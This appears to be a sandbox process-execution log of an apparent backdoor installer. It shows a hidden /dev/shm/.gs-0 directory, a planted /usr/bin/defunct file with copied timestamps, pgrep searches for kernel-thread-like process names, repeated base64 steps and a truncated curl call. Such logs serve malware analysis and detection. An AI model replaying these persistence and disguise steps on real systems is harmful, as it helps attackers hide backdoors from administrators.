                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/sed
                                                Arguments:sed s/[^a-zA-Z0-9]/\\\\&/g
                                                File size:121288 bytes
                                                MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/sed
                                                Arguments:sed s/[^a-zA-Z0-9]/\\\\&/g
                                                File size:121288 bytes
                                                MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/sed
                                                Arguments:sed s/[^a-zA-Z0-9]/\\\\&/g
                                                File size:121288 bytes
                                                MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/sed
                                                Arguments:sed s/[^a-zA-Z0-9]/\\\\&/g
                                                File size:121288 bytes
                                                MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/sed
                                                Arguments:sed s/[^a-zA-Z0-9]/\\\\&/g
                                                File size:121288 bytes
                                                MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/sed
                                                Arguments:sed s/[^a-zA-Z0-9]/\\\\&/g
                                                File size:121288 bytes
                                                MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/sed
                                                Arguments:sed s/[^a-zA-Z0-9]/\\\\&/g
                                                File size:121288 bytes
                                                MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/sed
                                                Arguments:sed s/[^a-zA-Z0-9]/\\\\&/g
                                                File size:121288 bytes
                                                MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/sed
                                                Arguments:sed s/[^a-zA-Z0-9]/\\\\&/g
                                                File size:121288 bytes
                                                MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/sed
                                                Arguments:sed s/[^a-zA-Z0-9]/\\\\&/g
                                                File size:121288 bytes
                                                MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/uname
                                                Arguments:uname -m
                                                File size:39288 bytes
                                                MD5 hash:4ac7c634c5bec95753c480e9d421dcc2

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/base64
                                                Arguments:base64 -w0
                                                File size:43352 bytes
                                                MD5 hash:81ddf3d1d8e681d22921836b9360405f

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/base64
                                                Arguments:base64 -d
                                                File size:43352 bytes
                                                MD5 hash:81ddf3d1d8e681d22921836b9360405f

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/sed
                                                Arguments:sed s/[^a-zA-Z0-9]/\\\\&/g
                                                File size:121288 bytes
                                                MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/pgrep
                                                Arguments:pgrep defunct
                                                File size:30968 bytes
                                                MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                Start time (UTC):09:11:58
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:58
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:58
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/pgrep
                                                Arguments:pgrep (\\[kstrp\\]|\\[watchdogd\\]|\\[ksmd\\]|\\[kswapd0\\]|\\[card0\\-crtc8\\]|\\[mm\\_percpu\\_wq\\]|\\[rcu\\_preempt\\]|\\[kworker\\]|\\[raid5wq\\]|\\[slub\\_flushwq\\]|\\[netns\\]|\\[kaluad\\])
                                                File size:30968 bytes
                                                MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/bin/bash
                                                Arguments:/bin/bash -c "echo TRUE"
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/dirname
                                                Arguments:dirname /dev/shm/.gs-0
                                                File size:39256 bytes
                                                MD5 hash:aafc5c13efcc5fc5b28b2cce6547765a

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/dirname
                                                Arguments:dirname /dev/shm
                                                File size:39256 bytes
                                                MD5 hash:aafc5c13efcc5fc5b28b2cce6547765a

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/date
                                                Arguments:date -r /dev/shm +%Y%m%d%H%M.%S
                                                File size:108920 bytes
                                                MD5 hash:b3d4bbb2fce7ba842e2ea0786997ca0d

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/dirname
                                                Arguments:dirname /dev/shm/.gs-0
                                                File size:39256 bytes
                                                MD5 hash:aafc5c13efcc5fc5b28b2cce6547765a

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/ls
                                                Arguments:ls -atr /dev/shm
                                                File size:142144 bytes
                                                MD5 hash:e7793f15c2ff7e747b4bc7079f5cd4f7

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/head
                                                Arguments:head -n1
                                                File size:47480 bytes
                                                MD5 hash:fd96a67145172477dd57131396fc9608

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/date
                                                Arguments:date -r /dev/shm/.. +%Y%m%d%H%M.%S
                                                File size:108920 bytes
                                                MD5 hash:b3d4bbb2fce7ba842e2ea0786997ca0d

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/mkdir
                                                Arguments:mkdir /dev/shm/.gs-0
                                                File size:88408 bytes
                                                MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/chmod
                                                Arguments:chmod 700 /dev/shm/.gs-0
                                                File size:63864 bytes
                                                MD5 hash:739483b900c045ae1374d6f53a86a279

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/touch
                                                Arguments:touch /dev/shm/.gs-0/.gs-rw.lock
                                                File size:100728 bytes
                                                MD5 hash:3859c173f5d3b37be3e531b7c84a9c68

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/rm
                                                Arguments:rm -f /dev/shm/.gs-0/.gs-rw.lock
                                                File size:72056 bytes
                                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/dirname
                                                Arguments:dirname /usr/bin/defunct
                                                File size:39256 bytes
                                                MD5 hash:aafc5c13efcc5fc5b28b2cce6547765a

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/dirname
                                                Arguments:dirname /usr/bin
                                                File size:39256 bytes
                                                MD5 hash:aafc5c13efcc5fc5b28b2cce6547765a

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/date
                                                Arguments:date -r /usr/bin +%Y%m%d%H%M.%S
                                                File size:108920 bytes
                                                MD5 hash:b3d4bbb2fce7ba842e2ea0786997ca0d

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:59
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/dirname
                                                Arguments:dirname /usr/bin/defunct
                                                File size:39256 bytes
                                                MD5 hash:aafc5c13efcc5fc5b28b2cce6547765a

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/ls
                                                Arguments:ls -atr /usr/bin
                                                File size:142144 bytes
                                                MD5 hash:e7793f15c2ff7e747b4bc7079f5cd4f7

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/head
                                                Arguments:head -n1
                                                File size:47480 bytes
                                                MD5 hash:fd96a67145172477dd57131396fc9608

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/date
                                                Arguments:date -r /usr/bin/dirsplit +%Y%m%d%H%M.%S
                                                File size:108920 bytes
                                                MD5 hash:b3d4bbb2fce7ba842e2ea0786997ca0d

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/touch
                                                Arguments:touch /usr/bin/defunct
                                                File size:100728 bytes
                                                MD5 hash:3859c173f5d3b37be3e531b7c84a9c68

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/chmod
                                                Arguments:chmod 600 /usr/bin/defunct
                                                File size:63864 bytes
                                                MD5 hash:739483b900c045ae1374d6f53a86a279

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/basename
                                                Arguments:basename /bin/true
                                                File size:39256 bytes
                                                MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/dirname
                                                Arguments:dirname /usr/bin/defunct
                                                File size:39256 bytes
                                                MD5 hash:aafc5c13efcc5fc5b28b2cce6547765a

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/base64
                                                Arguments:base64 -w0
                                                File size:43352 bytes
                                                MD5 hash:81ddf3d1d8e681d22921836b9360405f

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/base64
                                                Arguments:base64 -w0
                                                File size:43352 bytes
                                                MD5 hash:81ddf3d1d8e681d22921836b9360405f

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/base64
                                                Arguments:base64 -w0
                                                File size:43352 bytes
                                                MD5 hash:81ddf3d1d8e681d22921836b9360405f

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:00
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/curl
